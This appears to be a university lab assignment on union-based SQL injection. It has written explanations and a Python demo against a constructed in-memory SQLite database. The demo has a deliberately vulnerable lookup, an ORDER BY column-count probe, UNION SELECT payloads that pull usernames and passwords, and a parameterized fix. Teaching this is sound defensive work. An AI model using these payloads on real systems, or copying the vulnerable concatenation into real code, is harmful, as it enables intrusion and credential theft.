Lab9 SQL Injection - SQL Injection UNION Attacks
Objective:
- This lab focuses on exploring and understanding Union-Based SQL Injection attacks.
Participants will engage with a simulated web application that is vulnerable to SQL injection,
specifically through the misuse of the UNION SQL operator. The objective is to learn how to
identify, exploit, and subsequently defend against Union-Based SQL Injection vulnerabilities.
Submit a report addressing all the questions below in either PDF or Markdown format.
Additionally, include a video demonstrating the detailed process of your work to ensure the
authenticity of your lab exercise.
The report file name must be Class_YourStudentID_YourName_Lab9
What is a Union-Based SQL Injection attack, and how does it differ from other types of SQL injection
attacks?
A Union-Based SQL Injection is a type of SQL injection attack that abuses the UNION SQL operator to
append the results of an attacker-controlled SELECT statement to the results of the application's own
query, so that both are returned in a single result set. Like every SQL injection, it occurs when a web
application builds a query by concatenating user input into the SQL string without validating or
parameterizing it. What distinguishes the union-based variant is that it is an in-band technique: the
stolen data comes back directly in the application's normal response (for example, rendered as extra
rows in a product listing), so the attacker can read whole rows at once. Error-based injection instead
leaks data through database error messages, blind (boolean-based or time-based) injection infers data
one condition at a time from differences in page content or response time, and out-of-band injection
exfiltrates data over a separate channel such as DNS or HTTP requests made by the database server.
Explain the role of the UNION SQL operator in this type of attack and how it can be used to extract
data from a database that is not typically accessible through the intended use of a web application.
The UNION SQL operator plays a crucial role in Union-Based SQL Injection attacks by allowing
attackers to combine the results of two or more SELECT statements into a single result set. This can be
exploited to extract data from a database that is not typically accessible through the intended use of a
web application.
1. Combining Result Sets: The UNION operator is used to combine the result sets of two SELECT
statements. The structure of a UNION statement looks like this:
SELECT column1, column2 FROM table1 UNION SELECT column3, column4 FROM table2;
In a Union-Based SQL Injection attack, the attacker submits input containing a UNION SELECT so that it
is spliced into the original query when the application concatenates the input into the SQL string.
2. Exploiting Injection Points: The injection typically targets a value that the application
concatenates into the WHERE clause of its query. The attacker's input closes the string literal
that was meant to hold the value, appends the UNION SELECT, and ends with a comment sequence
(-- in most databases, # in MySQL) so that whatever follows in the original query is ignored.
For example, suppose the application builds its query from the template:
SELECT column1, column2 FROM table WHERE id = '$userInput'
Here, $userInput is the point where the attacker's input is inserted. If the attacker submits
1' UNION SELECT column3, column4 FROM table2 --
the database receives:
SELECT column1, column2 FROM table WHERE id = '1' UNION SELECT column3, column4
FROM table2 --';
The trailing quote that the developer wrote is now inside a comment, so the statement parses.
3. Matching Column Counts: For a successful Union-Based SQL Injection, the attacker needs to
ensure that the injected SELECT statement returns the same number of columns as the original
query, and that the data type of each injected column is compatible with the corresponding
column of the original query. Both are requirements of the UNION operator itself; if either is
violated the database returns an error and no rows come back. Attackers determine the column
count without seeing the query by injecting ORDER BY 1, ORDER BY 2, and so on until the database
complains that the position is out of range, or by injecting UNION SELECT NULL, NULL, ... with an
increasing number of NULLs until the query succeeds (NULL is compatible with every column type).
4. Extracting Data: If the column count and types match, the UNION operator appends the
injected rows to the original result set, and the application renders them wherever it would
normally display the original columns. The attacker can therefore read data from any table the
application's database account is permitted to query, not only the table the page was designed
to show. Each injected value must land in a column position that the page actually displays; a
position the page discards (such as an internal id) carries no data back, so attackers usually
place the interesting values in a text column that is shown.
For example, consider an application that looks up a user by id with the query
SELECT username, password FROM users WHERE id = '$userInput'
and an attacker who submits the input 1' UNION SELECT username, password FROM admin_users --
The database then receives:
SELECT username, password FROM users WHERE id = '1' UNION SELECT username, password FROM
admin_users --';
If successful, this query combines the result of the original lookup with every username and
password from the 'admin_users' table, and the page displays them as if they were ordinary
user records.
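The four steps above, worked end to end as an added example that is not part of this lab or of the
challenge application: a deliberately vulnerable lookup that concatenates user input, the ORDER BY probe
that discovers the column count, the UNION SELECT payload built to that count, and the parameterized
query that defeats the same payload. The database is an in-memory SQLite instance with constructed
tables (products, users) and constructed rows; the function names (vulnerable_lookup, safe_lookup,
find_column_count, union_attack) are my own and do not appear in the lab.

```python
import sqlite3


def build_db():
    """Create an in-memory SQLite database with constructed sample data.

    'products' stands in for the data the page is meant to show; 'users'
    is the data the attacker wants. Neither table comes from the lab.
    """
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, description TEXT);
        INSERT INTO products VALUES (1, 'Widget', 'A basic widget');
        INSERT INTO products VALUES (2, 'Gadget', 'A fancy gadget');
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('alice', 'alice-secret');
        INSERT INTO users VALUES ('bob', 'bob-secret');
    """)
    return conn


def vulnerable_lookup(conn, user_input):
    """Deliberately vulnerable: the input is concatenated into the SQL string,
    so a quote in the input ends the literal and the rest is parsed as SQL."""
    query = f"SELECT name, description FROM products WHERE id = '{user_input}'"
    return conn.execute(query).fetchall()


def safe_lookup(conn, user_input):
    """Hardened version: a parameterized query binds the input as a value.
    The same payload is compared against the id column and matches nothing."""
    query = "SELECT name, description FROM products WHERE id = ?"
    return conn.execute(query, (user_input,)).fetchall()


def find_column_count(conn, max_columns=10):
    """Step 3: discover how many columns the original SELECT returns by
    injecting ORDER BY 1, ORDER BY 2, ... until the database rejects the
    position as out of range. The last accepted position is the count."""
    count = 0
    for n in range(1, max_columns + 1):
        try:
            # '--' comments out the closing quote the application appends
            vulnerable_lookup(conn, f"1' ORDER BY {n} --")
            count = n
        except sqlite3.OperationalError:
            break
    return count


def union_attack(conn, wanted=("username", "password"), table="users"):
    """Step 4: build a UNION SELECT with exactly the discovered number of
    columns, padding with NULL if the original query has more columns than
    we want to read, and return the rows the vulnerable page would display."""
    n = find_column_count(conn)
    if n < len(wanted):
        raise ValueError("original query returns too few columns for this payload")
    columns = list(wanted) + ["NULL"] * (n - len(wanted))
    payload = f"1' UNION SELECT {', '.join(columns)} FROM {table} --"
    return vulnerable_lookup(conn, payload)


if __name__ == "__main__":
    db = build_db()
    print("columns in original query:", find_column_count(db))
    for row in union_attack(db):
        print("vulnerable page shows:", row)
    print("parameterized lookup with the same payload:",
          safe_lookup(db, "1' UNION SELECT username, password FROM users --"))
```

The vulnerable page returns the Widget row followed by both rows of users, because UNION glued the
stolen rows onto the product listing; the parameterized version returns an empty list for the same
input, since the whole payload is bound as one value and compared against id. On MySQL the comment
sequence must be written as -- followed by a space (or as #), which is why real payloads usually end
with "-- " rather than a bare "--".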
Challenge Link: https://1drv.ms/u/s!AuqMVnroIlhkyEw2ZVkXKWyLEpR3?e=iesUgn